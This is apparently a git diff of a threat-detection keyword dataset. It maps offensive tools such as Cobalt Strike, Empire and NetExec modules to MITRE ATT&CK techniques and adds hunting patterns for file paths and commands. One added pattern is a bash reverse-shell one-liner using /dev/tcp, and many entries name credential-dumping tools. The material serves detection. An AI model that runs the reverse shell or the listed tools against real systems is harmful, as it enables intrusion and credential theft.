T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault remove*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" @@ -18788,5 +18978,5 @@ "token-vault use*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "uselistener http*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "usemodule */*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"usestager *","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"wapiti -*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"usestager *","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"wapiti -*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" diff --git a/only_keywords.txt b/only_keywords.txt index 9866166f6..40ce1796b 100644 --- a/only_keywords.txt +++ b/only_keywords.txt @@ -2604,6 +2604,7 @@ */.manspider/loot* */.msf4/* */.ntdissector* +*/.nxc/obfuscated_scripts/* */.sliver/logs* */.ssh/RAI.pub* *//:ptth* @@ -2646,6 +2647,7 @@ */ADACLScanner.git* */adalanche/modules/* */adconnectdump.git* +*/adcs.py* */adcs_enum/* */adcs_request/adcs_request.* */adcs_request/CertCli.* @@ -2654,6 +2656,7 @@ */adcs-enum.py* */ADCSKiller* */ADCSPwn.git* +*/add_computer.py* */add_groupmember.py* */address-info.nse* */AddUser-Bof.* @@ -2885,13 +2888,16 @@ */BesoToken.exe* */BesoToken.git* */bettercap* +*/bh_owned.py* */bhqc.py -* */BIFFRecordEncryption.cs* */bin/0d1n* */bin/AceLdr* +*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'* */bin/fake-sms* */bin/gorsair * */bin/hakrawler* +*/bin/nxcdb* */bin/posh* */bin/pupysh* */bin/read_i.php?a1=step2-down-b&a2=* @@ -3307,6 +3313,7 @@ */D1rkInject.git* */d4em0n/exrop* */daap-get-library.nse* +*/daclread.py* */DAMP.git* */DanMcInerney/ridenum* */daphne.git* @@ -3322,6 +3329,7 @@ */data/auxiliary/gather* */data/empire.db* */data/exploits/* +*/data/nxc.conf* */data/shellcode* */DavRelayUp.git* */DavRelayUp/* @@ -3375,6 +3383,7 @@ */detect-hooks.h* */Detect-Hooks/* */DFSCoerce.git* +*/dfscoerce.py* */dhcp-discover.nse* */Dialogs/Payload.hpp* */dicom-brute.nse* @@ -3480,6 +3489,7 @@ */drda-brute.nse* */drda-info.nse* */Drones/SleepDialogue.razor* +*/drop-sc.py* */drunkpotato* */dsniff.c* */dsniff.services* @@ -3535,6 +3545,7 @@ */Empire.git */empire/client/* */empire:latest* +*/empire_exec.py* */EmpireProject* */enable-user.py* */enableuser/enableuser.x64.* @@ -3545,7 +3556,9 @@ */enum__secrets/*.py* */enum_av.md* */enum_av.py* +*/enum_av.py* */enum_cisco.md* +*/enum_dns.py* */enum_domain_info* */enum_f5.md* */enum_juniper.md* @@ -3653,6 +3666,7 @@ */FilelessPELoader* */final_shellcode_size.txt* */find_domain.sh* +*/find-computer.py* */FindModule.c* */FindObjects.cna* */FindSQLSrv.py* @@ -3720,6 +3734,7 @@ */Gemail-Hack.git* */GetBrowsers.ps1* */get-clipboard.py* +*/get-desc-users.py* */getLegit/cdnl* */getLegit/grkg* */getLegit/prvw* @@ -3864,6 +3879,8 @@ */goZulipC2.git* */GPOddity.git* */GPOddity/* +*/gpp_autologin.py* +*/gpp_password.py* */gpp-decrypt* */gpsd-info.nse* */GreatSCT/* @@ -3895,9 +3912,11 @@ */Hak5.sh* */hakrawler.git* */hancitor.profile* +*/handlekatz.py* */HandleKatz_BOF* */HarmJ0y* */HaryyUser.exe* +*/hash_spider.py* */hashcat* */hashdump_dc* */Hashi0x/* @@ -4122,6 +4141,7 @@ */imfiver/CVE-2022-0847* */impacket.* */impacket/* +*/impersonate.py* */impersonate-rs* */imperun * *cmd.exe /c whoami* */Imperva_gzip_WAF_Bypass* @@ -4173,6 +4193,7 @@ */instabrute.py* */instainsane.git* */instainsane.sh* +*/install_elevated.py* */install-sb.sh* */insTof.py* */interactive_shell.py* @@ -4189,6 +4210,7 @@ */Invoke-HostEnum.ps1* */Invoke-RunAs.ps1* */Invoke-SMBRemoting.git* +*/IOXIDResolver.py* */ip_spoof.rb* */IPayloadService.* */ip-forwarding.nse* @@ -4261,7 +4283,9 @@ */kdstab.* */KDStab.* */KDStab/* +*/keepass_discover.py* */keepass_discover_*.txt* +*/keepass_trigger.py* */KeeThief.git* */kerberoast.* */kerberoast.c* @@ -4325,6 +4349,7 @@ */lansearch.exe* */laps.py *--ldapserver* */laps.py *-u * -p * +*/laps.py* */laps_dump_*.txt* */LAPSDumper.git* */lastpass.py* @@ -4337,6 +4362,7 @@ */ldap_injection.txt* */ldap_search_bof.py* */ldap-brute.nse* +*/ldap-checker.py* */ldap-novell-getpass.nse* */LdapRelayScan.git* */ldap-rootdse.nse* @@ -4398,6 +4424,7 @@ */LSASSProtectionBypass/CredGuard.c* */LsassSilentProcessExit.git* */lsassy* +*/lsassy_dump.py* */lucksec/CVE-2022-0847* */lu-enum.nse* */luijait/arpspoofing* @@ -4436,6 +4463,7 @@ */manspider_*.log* */manspider_output*.txt */manspiderDump* +*/masky.py* */master/GPSCoordinates/* */master/JunctionFolder/* */master/PhantomService/* @@ -4455,6 +4483,7 @@ */merlin.js* */merlin.py* */merlin/agent_code/* +*/met_inject.py* */Metasploit* */metasploit/* */metasploit-framework/embedded/framework* @@ -4525,6 +4554,7 @@ */Mr-Un1k0d3r/* */Mr-xn/cve-2022-23131* */MS15-034.nse* +*/ms17-010.py* */msf.go */msf.swf* */msfcrawler* @@ -4536,9 +4566,13 @@ */Mshikaki.git* */mshta.cmd* */mshtajs.cmd* +*/msi_search.ps1* +*/msi-search.git* */msLDAPDump* +*/msol.py* */MSOLSpray* */msrpc-enum.nse* +*/mssql_priv.py* */ms-sql-brute.nse* */ms-sql-config.nse* */ms-sql-dac.nse* @@ -4581,6 +4615,7 @@ */n1nj4sec/pupy* */nanodump* */nanodump.* +*/nanodump.py* */nanorobeus.git* */nanorubeus/* */Native/SigFlip/* @@ -4612,6 +4647,7 @@ */netbus-version.nse* */netcreds.py* */NetExec.git* +*/netexec.py* */NetExec-main* */Net-GPPPassword.git* */nethunter-images/* @@ -4680,6 +4716,7 @@ */NoFilter.sln* */NoFilter.vcxproj* */nopac.exe +*/nopac.py* */No-PowerShell.cs* */No-PowerShell.exe* */nopowershell.git* @@ -4702,6 +4739,7 @@ */NTDLLReflection.git* */NtdllUnpatcher.git* */ntds_dump_*.txt* +*/ntdsutil.py* */ntlm.py* */ntlmquic* */NTLMRecon* @@ -4716,6 +4754,7 @@ */ntlmutil.py* */ntlmutil.py* */ntlmv1.py* +*/ntlmv1.py* */ntp-info.nse* */ntp-monlist.nse* */NtQuerySystemInformation.md* @@ -4726,6 +4765,10 @@ */Nuages_Cli* */nuagesAPI.js* */nxc --help* +*/nxc.exe* +*/nxc/parsers/ip.py* +*/nxc/parsers/nmap.py* +*/nxc-ubuntu-latest* */nysm bash* */nysm -dr socat TCP4-LISTEN* */nysm -r ssh *@* @@ -4818,6 +4861,7 @@ */parrot-on-docker/* */parrotsec/* */ParsedMalleableData.txt* +*/parsers/nessus.py* */pass_gen.pl* */PassDetective.git* */passhash.sl* @@ -4868,6 +4912,7 @@ */persistence2.rc* */peterspbr/dirty-pipe-otw* */PetitPotam.git* +*/petitpotam.py* */PEzor.cna* */PEzor.git* */PEzor.sh * @@ -4960,6 +5005,7 @@ */printerbug.py* */PrintMonitorDll.* */PrintMonitorDll/* +*/printnightmare.py* */PrintSpoofer.git* */PrintSpoofer.git* */PrintSpoofer/* @@ -4974,6 +5020,7 @@ */PrivKit.git* */PrivKit/* */proberbyte.go* +*/procdump.py* */process_herpaderping/* */process_killer.cpp* */processhacker-*-bin.zip* @@ -5103,9 +5150,12 @@ */rawrpc.py* */RC4BinaryEncryption.cs* */RC4Payload32.txt* +*/rcat-v*-win-x86_64.exe* */RCStep/CSSG/* +*/rdcman.py* */RDE1.git* */rdll_template* +*/rdp.py* */RDPassSpray.git* */RDPCredentialStealer.git* */rdp-enum-encryption.nse* @@ -5150,6 +5200,7 @@ */reGeorg.git* */RegistryPersistence.c* */Registry-Recon/* +*/reg-query.py* */regreeper.jpg* */Reg-Restore-Persistence-Mole* */regsvcs/meterpreter* @@ -5241,6 +5292,7 @@ */RunasCs.git* */RunasCs.git* */RunasCs.zip* +*/runasppl.py* */RunAsWinTcb.git* */RunAsWinTcb.iml* */runcalc.dll* @@ -5250,6 +5302,7 @@ */runshellcode.* */RuralBishop.git* */rusers.nse* +*/rustcat/releases/latest/download/* */rusthound.exe* */RustHound.git* */rvrsh3ll/* @@ -5278,6 +5331,7 @@ */scanner/portscan* */scanner/winrm* */scannerPort.go* +*/scan-network.py* */Scans/servers_all_smb*.txt* */ScareCrow -I * */sccmhunter* @@ -5295,6 +5349,7 @@ */ScRunHex.py* */scshell* */scshell.py* +*/scuffy.py* */searchsploit* */Seatbelt.txt* */Seatbelt/Commands* @@ -5333,6 +5388,7 @@ */sh_executor/*.go* */s-h-3-l-l/* */shadowcoerce.py* +*/shadowcoerce.py* */ShadowForgeC2* */ShadowSpray.git* */ShadowSpray/*.cs* @@ -5461,6 +5517,7 @@ */sleep_python_bridge/* */Sleeper/Sleeper.cna* */sleepmask.cna* +*/slinky.py* */SlinkyCat.git* */sliver.git* */sliver.pb.go* @@ -5574,6 +5631,7 @@ */spellgen.py * */spellstager.py * */spider.yaml* +*/spider_plus.py* */SpiderFoot-*.log.cs* */SpiderFoot.csv* */spiderfoot.git* @@ -5584,6 +5642,7 @@ */spoof/mdns* */spoof/spoof_windows.* */SpookFlare.git* +*/spooler.py* */spoolsystem/SpoolTrigger/* */spray/spray.py* */Spray365* @@ -5622,6 +5681,7 @@ */src/nysm.c* */src/RecycledGate.h* */src/Sleeper.cpp* +*/src/unixshell.rs* */srdi-shellcode.go* */ssh2-enum-algos.nse* */ssh-auth-methods.nse* @@ -5722,6 +5782,7 @@ */tcpshell.py* */Teamphisher.txt* */Teamphisher/targets.txt* +*/teams_localdb.py* */teamserver-linux.tar.gz* */teamserver-win.zip* */teamspeak2-version.nse* @@ -5836,6 +5897,7 @@ */tso-enum.nse* */tweetshell.sh* */twittor.git* +*/uac.py* */UACBypasses/* */UACME.git* */UAC-SilentClean/* @@ -5884,6 +5946,7 @@ */vajra/phishApp.py* */var/lib/ptunnel* */var/log/exegol/*.log* +*/veeam_dump.py* */Vegile.git* */venom.git* */venom.sh * @@ -5937,14 +6000,17 @@ */WDExtract.git* */wdextract32.exe* */wdextract64.exe* +*/wdigest.py* */WdToggle.c* */WdToggle.h* */weakpass.git* */Web/decouverte.txt* */Web/discovery.txt* */web/pwn.html* +*/web_delivery.py* */web_rce.py* */WebC2.cs* +*/webdav.py* */WebDavC2.git* */web-hacking-toolkit* */weblistener.py* @@ -5963,6 +6029,7 @@ */WfpTokenDup.exe* */whatlicense.git* */WheresMyImplant/* +*/whoami.py* */WhoAmI.task* */whois-domain.nse* */whois-ip.nse* @@ -5998,7 +6065,9 @@ */winrm.py* */winrmdll* */winrm-reflective-dll/* +*/winscp_dump.py* */Winsocky.git* +*/wireless.py* */wiresocks.git* */wmeye/* */WMI Lateral Movement/* @@ -6053,6 +6122,7 @@ */zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin* */zerologon.cna* */zerologon.py* +*/zerologon.py* */zhzyker/CVE-2020-5902* */zsh_executor/*.go* */zwjjustdoit/cve-2022-23131* @@ -6070,6 +6140,7 @@ *?PSAmsi*PSReflect.ps1* *?sample_sliver.json* *[!] Failed to enumerate Credman:* +*[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option* *[!] Failed to download legitimate GPO from SYSVOL (dc_ip:* *[!] Failed to write malicious scheduled task to downloaded GPO. Exiting* *[#] Ready For ETW Patch.* @@ -6165,7 +6236,9 @@ *\9.dll *\9.exe *\AbandonedCOMKeys.* +*\adcs.py* *\ADCSPwn* +*\add_computer.py* *\ADFSpoof.py* *\ADFSpray* *\ADGet.exe* @@ -6211,6 +6284,7 @@ *\BesoToken.cpp* *\BesoToken.exe* *\BesoToken.vcxproj* +*\bh_owned.py* *\bin\cme.exe* *\bin\shepard\* *\BITB-main* @@ -6268,6 +6342,7 @@ *\CurrentVersion\Uninstall\FreeFileSync_is1* *\CustomEncoding.cpp* *\D1rkInject\* +*\daclread.py* *\darkexe.py* *\DarkLoadLibrary.* *\dcrypt.exe* @@ -6286,6 +6361,7 @@ *\Dendron.bin* *\Dendron.exe* *\Dendron.sln* +*\dfscoerce.py* *\DInjector.sln* *\DInjector\* *\dist\sigthief.exe* @@ -6301,6 +6377,7 @@ *\donut.exe* *\donut\VanillaProgram.bin* *\Doraemon* +*\drop-sc.py* *\duedlligence.dll* *\dumper.ps1* *\dumpert.* @@ -6319,8 +6396,11 @@ *\Elite.csproj* *\Elite.sln* *\emailall.py* +*\empire_exec.py* *\enc_shellcode.bin* *\enc_shellcode.h* +*\enum_av.py* +*\enum_dns.py* *\ES.Alan.Core* *\EternalHushCore.dll* *\EternalHushCore\* @@ -6346,6 +6426,7 @@ *\Fertliser.exe* *\Fertliser.pdb* *\Files\ContainersFileUrls.txt* +*\find-computer.py* *\follina.py* *\FreeFileSync.exe* *\FreeFileSync\Logs\* @@ -6354,7 +6435,9 @@ *\freeze.go *\FtpC2\* *\FudgeC2* +*\get_netconnections.py* *\GetBrowsers.ps1* +*\get-desc-users.py* *\Get-SpoolStatus.ps1* *\GetWebDAVStatus\ *\GetWebDAVStatus_x64* @@ -6371,15 +6454,21 @@ *\go-secdump* *\goZulipC2* *\GPOddity\* +*\gpp_autologin.py* +*\gpp_password.py* +*\group_members.py* *\Group3r.exe* *\Grouper2.exe* +*\groupmembership.py* *\GzipB64.exe* *\HackBrowserData* *\Hades.exe* *\hades.exe* *\hades-main.zip* *\handlekatz.exe* +*\handlekatz.py* *\harvest.cmb* +*\hash_spider.py* *\hashview.py* *\HiddenDesktop\* *\hijackers\* @@ -6401,6 +6490,7 @@ *\IDiagnosticProfileUAC* *\iis_controller.py* *\impacket.* +*\impersonate.py* *\Implant.exe * *\implant.exe *.exe *\ImplantSSP.exe* @@ -6408,9 +6498,11 @@ *\inceptor.py* *\injector.ps1 1 * *\injector.ps1 2 * +*\install_elevated.py* *\Inveigh.exe* *\inveigh.exe* *\Inveigh\bin\* +*\IOXIDResolver.py* *\IPfuscation.cpp* *\IPfuscation.exe* *\ipscan-*-setup.exe* @@ -6423,6 +6515,8 @@ *\JunctionFolder.csproj* *\katz.ps1* *\kdstab.exe* +*\keepass_discover.py* +*\keepass_trigger.py* *\KeeTheft.exe* *\kerberoast.c* *\KernelTokens.sys* @@ -6440,8 +6534,10 @@ *\Ladon.exe* *\Ladon.ps1* *\lansearch.exe* +*\laps.py* *\LAPSDumper\* *\ldap_search_bof.py* +*\ldap-checker.py* *\LibSnaffle* *\Loader\Loader.csproj* *\local_admins.csv* @@ -6452,18 +6548,22 @@ *\lsass.dmp* *\LSASSProtectionBypass\* *\LsassSilentProcessExit* +*\lsassy_dump.py* *\m3-gen.py* *\MaccaroniC2* +*\MachineAccountQuota.py* *\macoffe.pdb* *\malseclogon.* *\MalStuff.cpp* *\malware_runner.py* *\manspider_*.log* +*\masky.py* *\master\GPSCoordinates\* *\Mayhem.psm1* *\megatools-*-win64\* *\megatools.exe* *\mem_dll.pdb* +*\met_inject.py* *\mhydeath64* *\mimi32.exe* *\mimi64.exe* @@ -6472,17 +6572,29 @@ *\monkey.exe * *\monkey32.exe* *\monkey64.exe* +*\ms17-010.py* *\Mshikaki.cpp* +*\msi_search.c* +*\msi_search.exe* +*\msi_search.ps1* +*\msi_search.x64.o* +*\msi_search.x86.o* +*\msol.py* *\MSOL\DomainCompanyInfo.txt* +*\mssql_priv.py* *\mystikal.py* *\nanodump* +*\nanodump.py* *\net*\ftpagent.exe* *\net.exe" accounts* *\net.exe* localgroup admin* *\net.exe* sessions* *\net.exe* view */domain* *\net1 sessions* +*\netexec.py* +*\netexec.yml* *\NetExec-main* +*\NetExec-main\* *\NetLoader.exe* *\netscan.exe* *\netscan.exe* @@ -6503,6 +6615,7 @@ *\NoFilter.sln* *\NoFilter.vcxproj* *\nopac.exe* +*\nopac.py* *\NoPowerShell* *\NoPowerShell.* *\No-PowerShell.cs* @@ -6513,13 +6626,18 @@ *\NPPSpy.txt* *\ntdlll-unhooking-collection* *\ntdlol.txt* +*\ntdsutil.py* *\ntlm.py* *\NTLMRelay2Self* *\ntlmutil.py* +*\ntlmv1.py* *\NtoskrnlOffsets.csv* *\NtRemoteLoad.sln* *\NtRights\* *\Nuages_Cli* +*\nxc.exe* +*\nxc\parsers\ip.py* +*\nxc\parsers\nmap.py* *\obfy-1.0.zip* *\OffensiveCSharp\* *\out_pe.exe* @@ -6527,6 +6645,7 @@ *\papacat.ps1* *\papacat.zip* *\ParsedMalleableData.txt* +*\parsers\nessus.py* *\password.lst* *\Passwordfiles.txt* *\PatchingAPI.cpp* @@ -6536,6 +6655,7 @@ *\PerfExec.exe* *\Persistence.cpp* *\Persistence.exe* +*\petitpotam.py* *\pipe\brutepipe* *\PipeViewer.exe* *\PipeViewer.sln* @@ -6567,11 +6687,13 @@ *\PPLBlade-main* *\PPLFault* *\PPLKiller* +*\printnightmare.py* *\PrintSpoofer.cs* *\PrintSpoofer-1.0.zip* *\PrivEditor\* *\PrivescCheck* *\PrivKit\* +*\procdump.py* *\Process Hacker 2\* *\process_killer.cpp* *\ProduKey.exe* @@ -6598,6 +6720,9 @@ *\RasmanPotato* *\ratchatPT.go* *\ratchatPT.syso* +*\rcat-v*-win-x86_64.exe* +*\rdcman.py* +*\rdp.py* *\RDPCredsStealerDLL* *\RealTimeSync.exe* *\Reaper\Reaper.cpp* @@ -6609,6 +6734,7 @@ *\RedPersist.pdb* *\RedPersist.sln* *\RedPersist-main\* +*\reg-query.py* *\RemoteCamera.dll* *\Resources\Disks-NoEncryption.txt* *\resources\PROCEXP.sys* @@ -6625,6 +6751,7 @@ *\run\john\*.pl* *\run\john\*.py* *\RunasCs.cs* +*\runasppl.py* *\RunBOF.exe* *\RunOF.exe* *\RunOF\bin\* @@ -6633,6 +6760,7 @@ *\samantha.txt *\save_reg.hive* *\scanACLsResults.csv* +*\scan-network.py* *\scmuacbypass.cpp* *\scmuacbypass.exe* *\SCMUACBypass\* @@ -6645,6 +6773,7 @@ *\ScriptSentry.psd1* *\ScriptSentry.psm1* *\ScriptSentry.txt* +*\scuffy.py* *\Seatbelt.txt* *\Seatbelt\Commands\* *\ServerC2.cpp* @@ -6656,6 +6785,7 @@ *\SessionSearcher.csproj* *\SessionSearcher.exe* *\shadowcoerce.py* +*\shadowcoerce.py* *\ShadowSpray\*.cs* *\Sharefinder.ps1* *\SharpAzbelt.csproj* @@ -6687,6 +6817,7 @@ *\SimpleLoader.cpp* *\SimpleLoader.exe* *\sitadel.log* +*\slinky.py* *\SMB_RPC\*.py *\smuggler.py* *\sniff.py* @@ -6695,7 +6826,9 @@ *\spellbound-main* *\spellgen.py * *\spellstager.py * +*\spider_plus.py* *\SpoofCmdLine\TheThing* +*\spooler.py* *\SprayAD.cna* *\SprayAD.exe* *\SQLInfoDumps* @@ -6713,6 +6846,7 @@ *\systemic.txt *\TakeMyRDP* *\TASKSHELL.EXE* +*\teams_localdb.py* *\teamserver-win.zip* *\teamstracker.py* *\Temp\*\ntds.dit* @@ -6747,6 +6881,7 @@ *\Tor\torrc* *\TorBrowser* *\TrustExec.exe* +*\uac.py* *\UACME-*.zip* *\uberfile.py* *\unDefender.exe* @@ -6766,6 +6901,7 @@ *\uTorrent\* *\utweb.exe* *\UUID_bypass.py* +*\veeam_dump.py* *\wce32.exe* *\wce64.exe* *\wce-beta.zip* @@ -6774,11 +6910,15 @@ *\wdextract.vcxproj* *\wdextract32.exe* *\wdextract64.exe* +*\wdigest.py* *\WdigestOffsets.csv* +*\web_delivery.py* +*\webdav.py* *\WfpTokenDup.exe* *\whatlicense-main\* *\WheresMyImplant* *\while_dll_ms* +*\whoami.py* *\Windows\Prefetch\PSEXEC* *\Windows\Tasks\Certipy* *\Windows\Tasks\p4yl0ad* @@ -6789,7 +6929,9 @@ *\WindowsShareFinder.cs* *\Win-PS2EXE* 